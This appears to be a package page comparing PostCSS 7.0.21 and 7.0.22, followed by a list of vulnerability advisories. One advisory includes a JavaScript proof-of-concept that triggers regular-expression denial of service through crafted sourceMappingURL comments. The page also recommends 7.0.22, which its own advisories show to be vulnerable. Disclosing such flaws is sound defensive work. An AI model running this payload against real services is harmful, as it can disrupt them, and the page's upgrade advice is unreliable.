PostCSS is a powerful JavaScript tool for transforming CSS, empowering developers to extend and enhance their styling workflows with plugins. Versions 7.0.21 and 7.0.22, while seemingly close, present some notable differences. Both versions share the same core dependencies: chalk for colorful console output, source-map for debugging, and supports-color for terminal color detection. Core information like the MIT license, author Andrey Sitnik, and the source code repository remain consistent as well.
However, significant differences emerge in the details of their distribution packages. Version 7.0.22 boasts a smaller unpacked size of 600,232 bytes, a substantial reduction from version 7.0.21's 1,085,084 bytes. This shrinking indicates potential optimizations in the codebase or resource inclusion, which can reduce the project's overall footprint and improve installation times, ultimately offering faster builds and deployments. Furthermore, the file count within the package also decreased from 38 to 35, likely correlating with the size reduction. The newer 7.0.22 version was released on November 18, 2019, succeeding version 7.0.21 which was released on October 25, 2019, meaning it includes around a month of fixes and enhancements. Developers should generally opt for the latest version (7.0.22) for the most up-to-date improvements and bug fixes.
All the vulnerabilities related to the version 7.0.22 of the package
Regular Expression Denial of Service in postcss
The package postcss versions before 7.0.36 or between 8.0.0 and 8.2.13 are vulnerable to Regular Expression Denial of Service (ReDoS) via getAnnotationURL() and loadAnnotation() in lib/previous-map.js. The vulnerable regexes are caused mainly by the sub-pattern
\/\*\s* sourceMappingURL=(.*)
var postcss = require("postcss")
function build_attack(n) {
var ret = "a{}"
for (var i = 0; i < n; i++) {
ret += "/*# sourceMappingURL="
}
return ret + "!";
}
postcss.parse('a{}/*# sourceMappingURL=a.css.map */') for (var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i) try {
postcss.parse(attack_str) var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
} catch (e) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms");
}
}
}
Regular Expression Denial of Service in postcss
The npm package postcss from 7.0.0 and before versions 7.0.36 and 8.2.10 is vulnerable to Regular Expression Denial of Service (ReDoS) during source map parsing.
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.